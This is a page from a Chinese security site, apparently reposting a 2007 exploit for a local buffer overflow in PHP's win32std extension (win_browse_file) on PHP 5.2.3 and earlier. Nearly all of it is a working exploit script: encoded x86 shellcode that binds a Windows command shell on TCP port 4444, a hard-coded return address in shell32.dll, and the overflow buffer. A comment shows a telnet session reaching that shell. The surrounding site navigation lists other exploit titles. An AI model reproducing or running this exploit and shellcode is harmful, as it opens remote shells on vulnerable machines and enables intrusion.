首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit 来源：www.vfocus.net 作者：Inphex 发布时间：2007-08-23   <?php /* Inphex 317 Bytes , Windows Command Shell  Bind TCP Inline , Architecture x86 , Windows TinyXP - vm. GET /script.php HTTP/1.1\n telnet 192.168.2.32 4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\apache> 7ffdf020  7c911005 7c9110ed 00000001 00000000 shoutz go to Kevin Finisterre */ if(!function_exists('win_browse_file')) { die('win32std extension is not available'); } $shellcode= "\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4". "\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc4\xf7\xd7\x5c". "\x6a\xef\xd1\x5c\x8a\x10\x41\x28\x19\xca\xa6\xa5\xa7\x2e\x2c". "\xc5\x22\x36\x33\xd9\xa6\x89\x2b\xae\xe6\x35\x4d\x5b\x51\xbe". "\x79\x10\x63\x2e\xb0\xe6\xfd\x02\x37\x26\x89\x5d\xf9\x6d\x7f". "\x60\x3b\x9a\x74\x59\xef\x79\x5d\xe8\xea\x09\xc2\x36\xf4\xe6". "\x9b\xbd\xfa\xb3\xe8\x9e\x1e\x45\x04\x23\x33\xce\x53\x4f\x6f". "\xcc\x02\x4c\x5e\x37\xa0\xd9\xe2\xf7\xa2\x9d\xe8\x7c\xc4\x01". "\x5c\x09\x65\x31\xc0\x66\xe8\x0f\xf2\x9a\xa4\x70\xdc\x05\x16". "\xe8\x89\xfa\xaa\x9c\x3e\x8e\xf8\x03\x95\x8f\x2d\xd3\xde\x9d". "\x32\x18\xb1\xa2\x1d\x01\xb8\xb8\xc4\x3c\x57\x4a\x0b\x6b\xc2". "\x49\xf4\x43\x7a\x97\x03\x96\xd6\x70\xeb\x8e\x7a\x2c\x40\x7d". "\x2e\x91\x35\xc2\x83\xea\x6a\xa2\x4b\x04\xd7\x4c\xdf\xaf\x06". "\x05\xb7\x0b\xd2\x55\x8f\x03\x1c\x43\x65\xbc\xb3\x3e\x85\x6c". "\x5b\x64\xd4\xa3\x75\x33\xd8\x6a\xd6\xee\xd9\x43\xb1\xf5\x6f". "\xe2\x0b\xa2\x90\x3c\xdb\x18\x3b\x94\x23\x70\x50\x7e\x3b\x09". "\x91\x06\x94\x16\xcb\xac\xe5\x38\x92\x24\x7e\xde\x33\xda\x13". "\x97\x21\x76\xbc\xfe\x80\x4b\xb5\xe7\xb9\x17\x4f\x05\x0c\x58". "\xbc\x63\x91\x1a\x6e\x8d\x2c\xb7\xe3\xfc\xcb\xff\xa8\x55\x80". "\x68\xdd\x57\x64\x7e\xde\xd2\xcf\x80\xf6\x47\x87\x2c\xa6\x26". "\x76\xbb\x49\x99\x29\x6e\x1b\xe6\x1a\xf8\x36\xc1\x9e\x37\x1b". "\x0e\x76\xad\x63\x0f\x40\xcd\x4c\x64\xf8\xcd\xee\xbe\x63\xd1". "\x27\x6c\x93\xfd\xa0\x60\xe1\xfa\x6f\xd3\x09\xd4\x6f\x03\xf5". "\xd9\x8f"; $eip = "\xDC\x1C\x9C\x7C"; //shell32.dll win_browse_file( 1, NULL, str_repeat( "A", 260 )."".$eip."XXXX\x20\xf0\xfd\x7f".str_repeat("C",500).$shellcode.str_repeat("C",300), NULL, array( "*" => "*.*" ) ); ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Mercury/32 4.51 SMTPD CRAM-MD5 ·PHP <= 5.2.3 (php_win32sti) Lo ·PHP 5.2.3 php_ntuser ntuser_ge ·Cisco IP Phone 7940 (10 SIP me ·Joomla Component BibTeX <= 1.3 ·Cisco IP Phone 7940 (3 SIP mes ·PHP FFI Extension 5.0.5 Local ·eCentrex VOIP Client module (u ·SunShop 4.0 RC 6 (search) Remo ·Mercury SMTPD Remote Preauth S ·PHP Perl Extension Safe_mode B ·PHP <= 5.2.0 (php_win32sti) Lo   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved